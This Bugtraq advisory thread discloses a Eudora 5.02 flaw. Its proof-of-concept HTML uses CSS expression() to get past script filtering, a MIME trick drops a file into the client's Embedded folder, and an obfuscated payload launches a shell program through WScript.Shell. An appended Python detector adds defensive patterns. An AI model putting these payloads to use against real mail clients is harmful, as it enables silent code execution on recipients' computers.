Bugtraq mailing list archives

Re: feeble.you!dora.exploit


From: "http-equiv () excite com" <http-equiv () excite com>
Date: Wed, 21 Mar 2001 07:48:28 -0800

Further to all of this, we include a generic more illustrative (and user
friendly test working example) [at the end of this batch of quotes].

This defeats the so-called "Allow executables in HTML content" being
disabled.

Example at the end of this screed.

On Tue, 20 Mar 2001 11:23:48 -0800 (PST), http-equiv () excite com wrote:

|  |Jeff Beckley wrote:
|  |
|  |>At 01:38 AM 3/18/2001 -0800, http-equiv () excite com wrote:
|  |>Silent delivery and installation of an executable on a target
|  |>computer. No client input other than opening an email using
|  |>Eudora 5.02 - Sponsored Mode provided 'use Microsoft viewer'
|  |>and 'allow executables in HTML content' are enabled.
|  |
|  |
|  |The "Allow executables in HTML content" setting is turned off by
|  |default.  The online help and user manual mention that the
|  |setting should remain off for security reasons.
|
|  This of course is 100% correct. Unfortunately on closer examination we find
|  that this too can be defeated quite easily.  Consider the following
|  non-JavaScript:
|
|
|  <!doctype html public "-//w3c//dtd html 4.0 transitional//en">
|
|  <img
|  SRC="file://C:\WINDOWS\APPLIC~1\QUALCOMM\EUDORA\Embedded\malware.gif"
|  height=2 width=2
|  STYLE="left:expression(location.href='http://www.malware.com');"></html>
|
|  <br>
|  <br>
|  </body></html>
|
|  This slips through, with "Allow executables in HTML content" disabled.
|  Therefore the results will be the same:
|
|  <img SRC="" height=1 width=1
|  STYLE="left:expression (malware.location.href='cid:malware.com');"></
|
|  ...etc
|
|  Disable the 'Microsoft Viewer' thing. That's the problem.
|
|  A good repair can be by reviewing all the necessary tricks to inject
|  JavaScript into Hotmail Accounts. These are well documented here and dating
|  back for quite some time. It appears the mail client seeks typical script
|  tags, which is defeated as above.  Additionally you might want to not allow a
|  crafted inline file to transfer automatically to your embedded folder:
|
|  Content-Type: application/octet-stream; charset=iso-8859-1
|  Content-ID: <malware.com>
|  Content-Transfer-Encoding: base64
|  Content-Disposition: inline; filename="You!DORA.html"
|
|  We note that if the content-type is manipulated we can route the file to the
|  'Embedded' folder. Casual observation suggests image files and *.exe are
|  routed there, while *.html is not; hence the constructed Content-Type:
|  application/octet-stream; charset=iso-8859-1 while the file is:
|  Content-Disposition: inline; filename="You!DORA.html"
|
|
|  ---
|  http://www.malware.com
|
|

This is specifically constructed to fire the ActiveX warning so that it is
visually illustrated (harmless WSH to fire telnet if you click okay).

REPEAT: this is by design and only for illustrative purposes (lest some
idiot complain this demo has a warning and is a lame "exploit").

  <img SRC="cid:malware.com" height=2 width=2
STYLE="left:expression(document.write('\u0020\u0020\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u0076\u0061\u0072\u0020\u0077\u0073\u0068\u003d\u006e\u0065\u0077\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0027\u0057\u0053\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0068\u0065\u006c\u006c\u0027\u0029\u003b\u0020\u0020\u0077\u0073\u0068\u002e\u0052\u0075\u006e\u0028\u0027\u0074\u0065\u006c\u006e\u0065\u0074\u002e\u0065\u0078\u0065\u0027\u0029\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u003c\u0021\u002d\u002d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0061\u006c\u0077\u0061\u0072\u0065\u002e\u0063\u006f\u006d\u0020\u0032\u0032\u002e\u0030\u0032\u002e\u0030\u0031\u0020\u002d\u002d\u003e'))">

Once again:

Tested on win98, IE5.5, "Eudora 5.0.2 -- Sponsored Mode", "Microsoft Viewer"
enabled, "Allow executables in HTML content" DISABLED.


end call

---
http://www.malware.com
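
Both behaviours described in this post can be checked for on the receiving side: active content carried by a CSS expression() in a STYLE attribute instead of a script tag, and an inline *.html part declared as application/octet-stream. This is an added example, not part of the original post; the function names, the extension list and the sample message are assumptions constructed for illustration.

```python
import re
from email import message_from_string
from html.parser import HTMLParser

# CSS dynamic-property syntax; whitespace before "(" is tolerated, as in the post.
EXPRESSION = re.compile(r"expression\s*\(", re.IGNORECASE)
ACTIVE_EXT = (".html", ".htm", ".hta", ".js", ".vbs")  # assumed list
# Constructed sample message (harmless expression, placeholder attachment).
SAMPLE = """\
Content-Type: multipart/related; boundary="b1"

--b1
Content-Type: text/html; charset=iso-8859-1

<html><body><img SRC="cid:example" height=2 width=2
STYLE="left:expression (0)"></body></html>
--b1
Content-Type: application/octet-stream; charset=iso-8859-1
Content-ID: <example>
Content-Disposition: inline; filename="note.html"

<b>placeholder</b>
--b1--
"""

class StyleScanner(HTMLParser):
    """Records tags whose style attribute carries a CSS expression()."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:  # HTMLParser lower-cases attribute names
            if name == "style" and value and EXPRESSION.search(value):
                self.hits.append(f"css-expression in <{tag}> style")

def scan_message(raw):
    """Return a list of findings for one message given as text."""
    findings = []
    for part in message_from_string(raw).walk():
        ctype, fname = part.get_content_type(), (part.get_filename() or "").lower()
        mismatch = ctype == "application/octet-stream" and fname.endswith(ACTIVE_EXT)
        if ctype == "text/html":
            scanner = StyleScanner()
            scanner.feed(part.get_payload(decode=True).decode("latin-1"))
            findings += scanner.hits
        elif mismatch and part.get_content_disposition() == "inline":
            findings.append(f"inline {fname!r} declared as {ctype}")
    return findings
```

Keyword matching of this kind is the approach the post shows being bypassed, so treat a hit as a triage signal; a renderer that drops STYLE attributes and active content outright is the sturdier control.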





